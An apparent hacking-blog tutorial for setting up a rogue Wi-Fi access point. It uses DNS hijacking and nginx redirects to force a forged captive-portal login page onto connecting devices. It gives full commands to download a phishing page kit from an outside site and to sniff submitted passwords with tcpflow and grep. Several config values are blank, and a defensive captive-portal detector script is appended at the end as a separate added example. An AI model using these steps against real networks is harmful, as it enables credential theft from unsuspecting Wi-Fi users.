Hack Wifi: Setup Your Fake Access Point


    It often happens that when you connect to a WiFi network, you get a notification or a splash screen that tells you to do something in order to use the WiFi. Usually, you will see a login screen. That screen is called Captive Portal.

    So, what is it? Captive Portal is a small functional web document usually triggered through DNS spoofing & server redirection rules to trick the OS. If successful, the OS will trigger the Captive Portal Login Page.

    Let's see how we can setup a Captive Portal Login Page.

    So, how does a captive portal work? It works through DNS hijacking or server redirection rules. Every OS has its own way of detecting a captive portal, but most OSes look for a 302 redirection response to a connectivity probe. Let's study each of their responses.


    Windows has its own, somewhat obscure way of detecting a captive portal. Usually, it probes one of two sites:



    Android checks the returned response code. For example, if the returned response is 302, the OS will assume it is a captive portal and trigger it. Usually, the probe is one of the following:



    Unlike Android and Windows, when an Apple device sends a request to the probe site, the site checks for a specific header that identifies the nature of the requesting device. Apple requests URLs such as:


    From iOS 7 onwards, Apple uses a specific User-Agent for captive portal requests, CaptiveNetworkSupport, which can be used to identify Apple devices.

    Let's see how to set up the captive portal. We will be using hostapd for the access point configuration, dnsmasq as the DHCP server, and nginx as our web server and for the redirection rules.

    STEP 1 Installation

    To achieve our objective, we will go through the setup step by step. First, update your repositories and install nginx and the other required tools:

    $ apt update
    $ apt install hostapd dnsmasq nginx

    Then put your wireless interface in monitor mode:

    $ airmon-ng start wlan1

    STEP 2 Rogue Access Point

    We are about to use hostapd for hosting our access point, but this time with a small amendment: here's a link for hosting an access point with roguehostapd, which in fact makes the task easier by replacing the actual configuration file with a few command-line arguments.

    Create and save the hostapd configuration for Access Point:

    $ nano /tmp/hostapd.conf
    ssid=[Fake AP Name]
    channel=[Fake AP Channel]

    Start hostapd service:

    $ hostapd /tmp/hostapd.conf


    STEP 3 DHCP Server

    Now, we need a DHCP server to set up a small network and provide the connecting users with IP addresses. We will use dnsmasq for this purpose. Create and save a new configuration file for dnsmasq:

    $ nano /tmp/dnsmasq.conf

    In the configuration above we used the address field. It resolves every hostname to the single IP address provided, which in our case is the gateway address where our forged website resides:


    In case you want to redirect only a few sites, you will have to define each site individually, followed by a slash and the IP address it should resolve to. This approach is used when you want to provide internet access to the users. For example:


    But we don't want that here, because we want to redirect as much as possible: we don't know which site a user is going to request, so why not redirect all of them?

    Start dnsmasq service:

    $ dnsmasq -C /tmp/dnsmasq.conf -d


    Finally, execute these two commands to assign the gateway IP address and netmask to your interface:

    $ ifconfig wlan1mon up netmask
    $ route add -net netmask gw

    STEP 4 Captive Portal

    Here starts the actual work. Create a new directory to place your website in and move to that directory. I will name it captive_portal.

    $ mkdir /var/www/captive_portal
    $ cd /var/www/captive_portal

    Now, download the Rogue AP website and extract the files under this directory:

    $ wget https://www.shellvoide.com/media/files/rogueap.zip
    $ unzip rogueap.zip -d ./

    Now you should have the files placed under your captive_portal directory. All we need now is to set up the nginx configuration for our captive portal project. First, remove the enabled sites from the nginx configuration directory:

    $ rm /etc/nginx/sites-enabled/*

    Now, create a new configuration file for your captive portal project and place the following directives and then save the file:

    $ nano /etc/nginx/sites-enabled/captive_portal
    server {
        listen 80;
        # directory where the portal website was extracted
        root /var/www/captive_portal;
        location / {
            # any request for a file that does not exist is redirected to the portal page
            if (!-f $request_filename) {
                return 302 $scheme://;
            }
        }
    }

    What happens in this nginx configuration is that whenever a user requests a file which doesn't exist, the request is redirected to our fake page, which is exactly what we are trying to accomplish. Note that this is the most important part: the redirection of non-existent files. The root directive specifies the directory where the website is placed. Finally, reload the nginx service:

    $ service nginx reload
    $ service nginx restart

    Check if nginx is correctly serving our fake page:

    $ service nginx status


    STEP 5 Capture Password

    Now that we have a working access point along with a forged page, we need a way to capture the submitted credentials. Previously, we used a MySQL database to store the data. However, there's an even better approach: sniff the network and capture what is POSTed. Open a terminal and execute this command:

    $ sudo tcpflow -i any -C -g port 80 | grep -i "password1="

    What is happening here is that we capture the whole network traffic on every interface and pipe it to grep, which looks for specific lines. I've set this up according to what is POSTed when a user enters a password and presses Enter on the captive portal login page. It will print the data on screen as soon as it is entered on the forged website:

    STEP 6 Internet Forwarding (Optional)

    The last step is to provide our users with internet access. However, achieving this is a bit tricky. What we need to do is change or comment out the address field in the dnsmasq configuration, but if we do, the captive portal will no longer work. So, what to do?

    To overcome this complication, i.e. to provide internet access while the captive portal is still served, the address field has to be defined explicitly for a given set of sites. For example, to redirect only Android-based operating systems, the address field would be:


    The same can be applied to other websites as well. There are several sites which have to be redirected correctly for this to work. I don't know all of them, but some of the well-known and widely implemented ones can be configured:


    Then restart dnsmasq with this configuration.

    Finally, we need another interface which has an internet connection; traffic from that interface will be forwarded to the access point interface. My internet-facing interface is named wlan0, from which I will forward traffic to wlan1mon. Execute the following commands with your respective interfaces:

    $ iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
    $ iptables --append FORWARD --in-interface wlan1mon -j ACCEPT

    Now, just one step to go...

    $ echo 1 > /proc/sys/net/ipv4/ip_forward

    It's all set up. Pick up your phone, connect to the rogue access point and see for yourself. If you enter a password in the fields and press Enter, the captured data will be printed in the tcpflow terminal:



    The conclusion that can be drawn from all of the above is that users can easily be tricked into performing unexpected tasks when it comes to WiFi. With a captive portal login, the overall credibility and interactivity of the access point increases and the attack surface becomes larger. Above all, the working of a captive portal rests entirely on the principle of redirection.
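The detection rule the post describes (a connectivity probe that comes back as a 302 instead of the known-good answer means something is intercepting the network) can be expressed as a small client-side check. This is an added example, not code from the original post: the probe URLs are not reproduced, the HTTP responses are constructed samples, and the `expected_status`/`expected_body` values are assumptions about what a given probe host normally returns.

```python
"""Client-side classification of a captive-portal connectivity probe.

Added example; not part of the original post. Raw responses below are
constructed, and the expected answer for a probe host is an assumption.
"""
from dataclasses import dataclass
from typing import Dict, Optional, Tuple


@dataclass
class ProbeResult:
    status: int
    location: Optional[str]
    captive: bool
    reason: str


def parse_http_response(raw: bytes) -> Tuple[int, Dict[str, str], bytes]:
    """Split a raw HTTP/1.x response into (status code, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    parts = lines[0].split(" ", 2)
    if len(parts) < 2 or not parts[0].startswith("HTTP/"):
        raise ValueError("not an HTTP response")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()  # header names are case-insensitive
    return int(parts[1]), headers, body


def classify_probe(raw: bytes, expected_status: int = 200,
                   expected_body: bytes = b"") -> ProbeResult:
    """Apply the rule from the post: a 3xx answer to a connectivity probe means
    a captive portal (or a rogue DNS/HTTP server) sits in the path. A status or
    body that differs from what the probe host is known to return is flagged
    too, since a server answering 200 with its own page is the same interception."""
    status, headers, body = parse_http_response(raw)
    location = headers.get("location")
    if 300 <= status < 400:
        return ProbeResult(status, location, True, f"redirected to {location}")
    if status != expected_status or (expected_body and expected_body not in body):
        return ProbeResult(status, location, True, "probe answered by an unexpected server")
    return ProbeResult(status, location, False, "direct internet access")


# Constructed samples: a redirecting portal versus a clean 204 from the probe host.
REDIRECTED = (b"HTTP/1.1 302 Moved Temporarily\r\nServer: nginx\r\n"
              b"Location: http://10.0.0.1/index.html\r\nContent-Length: 0\r\n\r\n")
CLEAN = b"HTTP/1.1 204 No Content\r\nContent-Length: 0\r\n\r\n"
```

Running `classify_probe(REDIRECTED, expected_status=204)` reports a captive portal with the redirect target, while `CLEAN` is classified as direct internet access.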
